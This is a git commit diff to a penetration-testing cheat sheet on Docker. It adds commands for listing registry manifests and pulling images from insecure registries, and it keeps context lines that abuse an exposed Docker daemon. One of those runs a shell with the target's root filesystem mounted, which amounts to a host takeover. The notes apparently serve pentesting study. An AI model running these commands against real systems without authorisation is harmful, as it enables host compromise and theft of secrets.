cleanup and additional information on how to pull images from an insecure docker registry

2024-01-21 21:44:13 +01:00 · 2024-01-21 21:44:13 +01:00 · aba2d26776
parent e22d73c04c
commit aba2d26776
1 changed files with 22 additions and 10 deletions
--- a/Exploits/Containers/Docker.md
+++ b/Exploits/Containers/Docker.md
@ -51,7 +51,27 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
 `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.

 ```sh
-curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
+curl http://test.com:5000/v2/<REPO>/<APP>/manifests/<TAG>
+```
+
+### Download Images from the Remote Repository
+
+Remote repositories might need to be added to the insecure registries before you are able to pull from them
+
+```sh
+echo '{"insecure-registries": ["insecure-registry.com:5000"]}' >> /etc/docker/daemon.json
+```
+
+Restart the docker service afterwards and take a look at the insecure registries via 
+
+```
+docker info
+```
+
+Download an image via
+
+```sh
+docker pull insecure-registry:5000/repository-name/image-name
 ```

 ## Remote Docker Daemon
@ -66,15 +86,7 @@ docker -H tcp://test.com:2375 exec <container> <cmd>
 docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
 ```

-
-## RCE via Exposed Docker Daemon
-
-Execute commands on socket
-
-```sh
-```
-
-* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
+Check out [root please](https://github.com/chrisfosterelli/dockerrootplease)

 ## Escape Container via Exposed Docker Daemon